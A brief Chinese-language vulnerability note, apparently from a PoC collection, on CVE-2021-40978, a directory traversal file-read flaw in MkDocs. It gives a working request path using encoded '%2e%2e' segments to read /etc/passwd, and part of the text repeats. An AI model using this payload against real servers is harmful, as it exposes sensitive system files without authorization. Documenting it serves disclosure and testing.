MKdocs 任意文件读取漏洞 CVE-2021-40978
漏洞描述
MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件
漏洞影响
网络测绘
漏洞复现
主页面
验证POC
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件
主页面
验证POC
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd